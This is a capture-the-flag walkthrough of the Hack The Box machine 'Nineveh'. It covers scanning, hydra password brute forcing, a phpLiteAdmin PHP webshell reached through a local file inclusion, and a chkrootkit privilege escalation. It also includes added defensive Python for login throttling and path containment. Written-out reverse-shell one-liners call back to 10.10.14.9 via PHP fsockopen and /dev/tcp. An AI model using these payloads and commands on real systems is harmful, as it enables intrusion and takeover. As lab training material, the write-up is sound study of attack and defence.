# Nineveh

## enum

### nmap

-sSCV

```
└─$ sudo nmap -sSCV 10.10.10.43
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-03 20:07 EDT
Nmap scan report for 10.10.10.43
Host is up (0.18s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT    STATE SERVICE  VERSION
80/tcp  open  http     Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
443/tcp open  ssl/http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
| tls-alpn: 
|_  http/1.1
| ssl-cert: Subject: commonName=nineveh.htb/organizationName=HackTheBox Ltd/stateOrProvinceName=Athens/countryName=GR
| Not valid before: 2017-07-01T15:03:30
|_Not valid after:  2018-07-01T15:03:30
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.18 (Ubuntu)
```

-sU

```
└─$ sudo nmap -sU 10.10.10.43
[sudo] password for kali: 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-03 20:05 EDT
Nmap scan report for 10.10.10.43
Host is up (0.17s latency).
All 1000 scanned ports on 10.10.10.43 are in ignored states.
Not shown: 1000 open|filtered udp ports (no-response)

Nmap done: 1 IP address (1 host up) scanned in 175.47 seconds
```

### nikto

```
└─$ nikto -h 10.10.10.43
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.43
+ Target Hostname:    10.10.10.43
+ Target Port:        80
+ Start Time:         2022-09-03 20:07:28 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: b2, size: 5535e4e04002a, mtime: gzip
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ /info.php: Output from the phpinfo() function was found.
+ OSVDB-3233: /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ 7864 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time:           2022-09-03 20:32:17 (GMT-4) (1489 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
```

### whatweb

```
└─$ whatweb 10.10.10.43
http://10.10.10.43 [200 OK] Apache[2.4.18], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[10.10.10.43]
```

### search exploit (Apache 2.4.18)

searchsploit

```
└─$ searchsploit apache 2.4.18
---------------------------------------------------- ---------------------------------
 Exploit Title                                      |  Path
---------------------------------------------------- ---------------------------------
Apache + PHP < 5.3.12 / < 5.4.2 - cgi-bin Remote Co | php/remote/29290.c
Apache + PHP < 5.3.12 / < 5.4.2 - Remote Code Execu | php/remote/29316.py
Apache 2.4.17 < 2.4.38 - 'apache2ctl graceful' 'log | linux/local/46676.php
Apache < 2.2.34 / < 2.4.27 - OPTIONS Memory Leak    | linux/webapps/42745.py
Apache CXF < 2.5.10/2.6.7/2.7.4 - Denial of Service | multiple/dos/26710.txt
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remot | unix/remote/21671.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Rem | unix/remote/47080.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Rem | unix/remote/764.c
Apache OpenMeetings 1.9.x < 3.1.0 - '.ZIP' File Dir | linux/webapps/39642.txt
Apache Tomcat < 5.5.17 - Remote Directory Listing   | multiple/remote/2061.txt
Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal | multiple/remote/6229.txt
Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal | unix/remote/14489.c
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47  | jsp/webapps/42966.py
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47  | windows/webapps/42953.txt
Apache Xerces-C XML Parser < 3.1.2 - Denial of Serv | linux/dos/36906.txt
Webfroot Shoutbox < 2.32 (Apache) - Local File Incl | linux/remote/34.pl
---------------------------------------------------- ---------------------------------
Shellcodes: No Results
```

#### priv esc

- https://www.exploit-db.com/exploits/46676

#### rce

- https://www.exploit-db.com/exploits/50406

### gobuster

http

```
└─$ gobuster dir -u http://10.10.10.43/ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -x .php,.js,.html -z
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.43/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              js,html,php
[+] Timeout:                 10s
===============================================================
2022/09/03 20:06:49 Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 178]
[ERROR] 2022/09/03 20:07:12 [!] Get "http://10.10.10.43/info.php": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
/server-status        (Status: 403) [Size: 299]
/department           (Status: 301) [Size: 315] [--> http://10.10.10.43/department/]
```

https

```
└─$ gobuster dir -k -u https://10.10.10.43/ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -z -x .php,.js,.html
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     https://10.10.10.43/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php,js,html
[+] Timeout:                 10s
===============================================================
2022/09/03 20:23:13 Starting gobuster in directory enumeration mode
===============================================================
/db                   (Status: 301) [Size: 309] [--> https://10.10.10.43/db/]
/index.html           (Status: 200) [Size: 49]
/server-status        (Status: 403) [Size: 300]
```

### web page

http

![](https://i.imgur.com/FD7FWp1.png)

https

![](https://i.imgur.com/Bon3LNF.jpg)

http /department

![](https://i.imgur.com/r6x4eXd.png)

https /db

![](https://i.imgur.com/Iq1jtyQ.png)

### brute force login

#### http /department

Enter `admin` and some password. The error message is different depending on the username:

- other: invalid username
- admin: Invalid Password!
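Seen from the defender's side, those two different messages are what make the account name guessable, and an unthrottled form is what a password brute force relies on. As an added example, not code from the original writeup or from the Nineveh box, here is how a login handler avoids both: one generic failure message for unknown user and wrong password, a dummy hash so unknown usernames cost the same time as real ones, a constant-time digest comparison, and a per-source lockout. The user store, the example password, the thresholds and all function names are assumptions made for this example.

```python
# Added example (not from the original writeup): a login handler written the
# way a form like /department/login.php should behave. The user store, the
# example password, the thresholds and all names are assumptions.
import hashlib
import hmac
import os
import time
from collections import defaultdict
from typing import Dict, List, Optional, Tuple

GENERIC_ERROR = "Invalid username or password."   # identical for both failure cases
PBKDF2_ITERATIONS = 100_000
MAX_FAILURES = 5         # failures per (source, username) before lockout
LOCKOUT_SECONDS = 300


def hash_password(password: str, salt: Optional[bytes] = None) -> Tuple[bytes, bytes]:
    """Return (salt, PBKDF2-SHA256 digest) suitable for storing."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return salt, digest


# Constructed user store: one account with a password chosen for this example.
_salt, _digest = hash_password("correct horse battery staple")
USERS: Dict[str, Tuple[bytes, bytes]] = {"admin": (_salt, _digest)}

# Dummy credential so an unknown username costs the same hashing time as a
# real one; otherwise response timing would still reveal which accounts exist.
_DUMMY_SALT, _DUMMY_DIGEST = hash_password("dummy-credential")

_failures: Dict[Tuple[str, str], List[float]] = defaultdict(list)


def _locked_out(key: Tuple[str, str], now: float) -> bool:
    """True when this (source, username) pair has too many recent failures."""
    recent = [t for t in _failures[key] if now - t < LOCKOUT_SECONDS]
    _failures[key] = recent
    return len(recent) >= MAX_FAILURES


def login(username: str, password: str, source_ip: str,
          now: Optional[float] = None) -> Tuple[bool, str]:
    """Authenticate and return (success, message). The message never says
    whether the username exists, and repeated failures are throttled."""
    now = time.time() if now is None else now
    key = (source_ip, username)
    if _locked_out(key, now):
        return False, "Too many attempts, try again later."

    salt, expected = USERS.get(username, (_DUMMY_SALT, _DUMMY_DIGEST))
    _, candidate = hash_password(password, salt)
    # Constant-time comparison: no early exit at the first differing byte.
    ok = hmac.compare_digest(candidate, expected) and username in USERS

    if not ok:
        _failures[key].append(now)
        return False, GENERIC_ERROR
    _failures.pop(key, None)
    return True, "Welcome."


def reset_state() -> None:
    """Clear the failure tracker (handy when exercising the handler)."""
    _failures.clear()


if __name__ == "__main__":
    # Both failure cases produce the same text, unlike the two messages seen above.
    print(login("nobody", "x", "10.10.14.9"))
    print(login("admin", "x", "10.10.14.9"))
    print(login("admin", "correct horse battery staple", "10.10.14.9"))
```

The lockout is keyed on source and username together, so a single source cannot walk a wordlist against one account, while a legitimate user on another address is not locked out by someone else's attempts. A real deployment would keep the failure table in shared storage rather than in process memory.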
Because the messages differ, I guessed there is an admin account.

This page sends a POST request like this:

```
POST /department/login.php HTTP/1.1
Host: 10.10.10.43
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 46
Origin: http://10.10.10.43
Connection: close
Referer: http://10.10.10.43/department/login.php
Cookie: PHPSESSID=hhliom4rceemu8orsh1iri2dj3
Upgrade-Insecure-Requests: 1

username=a&password=a
```

Try a password brute force using hydra:

```
└─$ hydra -f -l admin -P /usr/share/wordlists/rockyou.txt -s 80 10.10.10.43 http-post-form '/department/login.php:username=^USER^&password=^PASS^:Invalid Password!'
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-09-03 21:02:00
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://10.10.10.43:80/department/login.php:username=^USER^&password=^PASS^:Invalid Password!
[STATUS] 1013.00 tries/min, 1013 tries in 00:01h, 14343386 to do in 235:60h, 16 active
[STATUS] 1010.67 tries/min, 3032 tries in 00:03h, 14341367 to do in 236:31h, 16 active
[80][http-post-form] host: 10.10.10.43   login: admin   password: 1q2w3e4r5t
[STATUS] attack finished for 10.10.10.43 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-09-03 21:06:35
```

Found the user and password pair:

- login: admin
- password: 1q2w3e4r5t

login

![](https://i.imgur.com/2TcMAZO.png)

But this page has no vuln.

#### https /db

This page sends a POST request like this:

```
POST /db/index.php HTTP/1.1
Host: 10.10.10.43
Cookie: PHPSESSID=hhliom4rceemu8orsh1iri2dj3
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 52
Origin: https://10.10.10.43
Referer: https://10.10.10.43/db/index.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

password=a&remember=yes&login=Log+In&proc_login=true
```

Try a password brute force using hydra:

```
└─$ hydra -f -l admin -P /usr/share/wordlists/rockyou.txt -s 443 10.10.10.43 https-post-form '/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password.'
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-09-03 21:21:21
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-forms://10.10.10.43:443/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password.
[STATUS] 568.00 tries/min, 568 tries in 00:01h, 14343831 to do in 420:54h, 16 active
[443][http-post-form] host: 10.10.10.43   login: admin   password: password123
[STATUS] attack finished for 10.10.10.43 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-09-03 21:23:50
```

Found the password:

- password: password123

login

![](https://i.imgur.com/3yGQCMB.png)

This page looks interesting.

### remote code execution

Use this PoC: https://github.com/F-Masood/PHPLiteAdmin-1.9.3---Exploit-PoC

create db

![](https://i.imgur.com/xOXk7vO.png)

create table

![](https://i.imgur.com/Q5YpALb.png)

add field (set default value `<?php system($_GET[cmd]?)>`)

![](https://i.imgur.com/Xb6q3z2.png)

create

![](https://i.imgur.com/VuesWhW.png)

I access this with the cmd parameter, but it can't exec the command, so I rename the file to ninevehNotes.txt.php.

In http /department there seems to be an LFI. I have the path to the injected file: `/var/tmp/ninevehNotes.txt.php`.

I access this URL:

http://10.10.10.43/department/manage.php?notes=/var/tmp/ninevehNotes.txt.php&cmd=ls

![](https://i.imgur.com/UwUmVat.png)

I get the ls command's result.

### reverse shell

I could RCE. Now I get a reverse shell. This server allows PHP scripts, so I run a PHP rev shell command:

```
php -r '$sock=fsockopen("10.10.14.9",12345);system("/bin/bash <&3 >&3 2>&3");'
```

Listen on kali using nc:

```
└─$ sudo rlwrap nc -nlvp 1234
listening on [any] 1234 ...
```

Get the rev shell:

```
└─$ sudo rlwrap nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.10.43] 51400
whoami
www-data
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

I send linpeas.sh and pspy to /tmp. The pspy result is interesting:

```
2022/09/04 03:06:04 CMD: UID=0    PID=1864   | /bin/sh /usr/bin/chkrootkit 
2022/09/04 03:06:04 CMD: UID=0    PID=1863   | /bin/sh /usr/bin/chkrootkit 
2022/09/04 03:06:04 CMD: UID=0    PID=1866   | 
2022/09/04 03:06:04 CMD: UID=0    PID=1869   | /bin/sh /usr/bin/chkrootkit 
2022/09/04 03:06:04 CMD: UID=0    PID=1868   | grep -E ^tcp 
2022/09/04 03:06:04 CMD: UID=0    PID=1867   | /bin/sh /usr/bin/chkrootkit 
```

chkrootkit is running with root privileges. Search for a chkrootkit exploit:

```
└─$ searchsploit chkrootkit
---------------------------------------------------- ---------------------------------
 Exploit Title                                      |  Path
---------------------------------------------------- ---------------------------------
Chkrootkit - Local Privilege Escalation (Metasploit | linux/local/38775.rb
Chkrootkit 0.49 - Local Privilege Escalation        | linux/local/33899.txt
---------------------------------------------------- ---------------------------------
```

Use this PoC (linux/local/33899.txt). Reading it, I found the steps:

```
Steps to reproduce:

- Put an executable file named 'update' with non-root owner in /tmp (not mounted noexec, obviously)
- Run chkrootkit (as uid 0)
```

1. create a file named `update`
2. write the rev shell command in this file

```
#!/bin/bash
/bin/bash -i >& /dev/tcp/10.10.14.9/12345 0>&1
```

3. listen for the rev shell using nc on port 12345

```
└─$ rlwrap nc -nlvp 12345
listening on [any] 12345 ...
```

4. get a root shell

```
└─$ rlwrap nc -nlvp 12345
listening on [any] 12345 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.10.43] 49378
bash: cannot set terminal process group (14307): Inappropriate ioctl for device
bash: no job control in this shell
id
id
uid=0(root) gid=0(root) groups=0(root)
whoami
whoami
root
```

### get root.txt

```
cat root.txt
60e356c675cf5c59598329389b1d6dc3
```
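The `manage.php?notes=` include in the remote code execution section above reads whatever path it is handed, which is what turned a file written through phpLiteAdmin into code execution. As an added example, not code from the original writeup or from the box, here is the server-side check such a parameter needs, written in Python: the requested name is joined onto a fixed notes directory, resolved with `realpath`, and accepted only if the resolved file still lies under that directory and carries an allow-listed extension. The directory layout, file names and function names are constructed for the example; the containment check itself is generic.

```python
# Added example (not from the original writeup): constraining a
# "notes=<name>" include the way /department/manage.php should have.
# Directory layout, file names and function names are constructed here.
import os
import tempfile

ALLOWED_SUFFIXES = (".txt",)   # the only thing a "notes" page should ever read


def resolve_note(base_dir: str, requested: str) -> str:
    """Map a user-supplied note name onto a file inside base_dir.

    Raises ValueError for anything that is not a plain, allow-listed file that
    really lives under base_dir once symlinks and ../ have been resolved."""
    if not requested or os.path.isabs(requested) or "\x00" in requested:
        raise ValueError("empty name, absolute path or NUL byte")
    if not requested.endswith(ALLOWED_SUFFIXES):
        raise ValueError("extension not allowed")
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, requested))
    # Containment is checked on the *resolved* path, which is what defeats
    # both ../ traversal and a symlink dropped inside the notes directory.
    if os.path.commonpath([base, target]) != base:
        raise ValueError("path escapes the notes directory")
    if not os.path.isfile(target):
        raise ValueError("no such note")
    return target


def read_note(base_dir: str, requested: str) -> str:
    """Return the note's text, or raise ValueError if the name is rejected."""
    with open(resolve_note(base_dir, requested), encoding="utf-8") as fh:
        return fh.read()


def check_request(base_dir: str, requested: str) -> str:
    """Return 'ok' or 'rejected' for a candidate notes= value."""
    try:
        resolve_note(base_dir, requested)
        return "ok"
    except ValueError:
        return "rejected"


def build_demo_tree() -> str:
    """Construct a throwaway notes directory: one legitimate note, a file
    outside the directory, and a symlink inside pointing at that file."""
    root = tempfile.mkdtemp(prefix="notes-demo-")
    notes = os.path.join(root, "notes")
    os.makedirs(notes)
    with open(os.path.join(notes, "ninevehNotes.txt"), "w", encoding="utf-8") as fh:
        fh.write("constructed note content\n")
    with open(os.path.join(root, "secret.txt"), "w", encoding="utf-8") as fh:
        fh.write("outside the notes directory\n")
    try:
        os.symlink(os.path.join(root, "secret.txt"), os.path.join(notes, "link.txt"))
    except OSError:
        pass   # platforms without symlink support simply skip that case
    return notes


if __name__ == "__main__":
    notes_dir = build_demo_tree()
    for value in ["ninevehNotes.txt", "../secret.txt", "link.txt",
                  "/var/tmp/ninevehNotes.txt.php", "ninevehNotes.txt.php"]:
        print(f"{value!r:35} -> {check_request(notes_dir, value)}")
```

Rejecting by extension before touching the filesystem keeps a `.php` name from ever reaching the include, and the `commonpath` test on the resolved path is the part that a plain string comparison against the directory prefix would get wrong (a name like `notes-old/` would pass a prefix check but fails containment here).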